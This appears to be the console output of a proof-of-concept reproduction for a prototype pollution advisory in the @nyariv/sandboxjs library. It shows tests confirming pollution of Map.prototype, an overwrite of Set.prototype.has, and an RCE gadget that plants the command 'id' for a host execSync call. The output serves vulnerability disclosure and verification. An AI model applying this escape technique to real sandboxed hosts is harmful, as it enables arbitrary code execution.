============================================================
GHSA-ww7g-4gwx-m7wj Reproduction
@nyariv/sandboxjs prototype pollution via array intermediary
============================================================

[TEST 1] Prototype pollution via array intermediary
Before: "polluted" in Map.prototype = false
After: "polluted" in Map.prototype = true
Map.prototype.polluted = pwned
[PASS] Prototype pollution confirmed!

[TEST 2] Overwrite Set.prototype.has
Set.prototype.has === isFinite: true
[PASS] Set.prototype.has was successfully overwritten!

[TEST 3] RCE gadget via prototype pollution
new Map().cmd = id
[PASS] RCE gadget works - injected command in prototype!
      If host code did: execSync(new Map().cmd), it would execute "id"

============================================================
All tests completed - vulnerability confirmed!
============================================================

[Cleanup] Removing prototype pollution...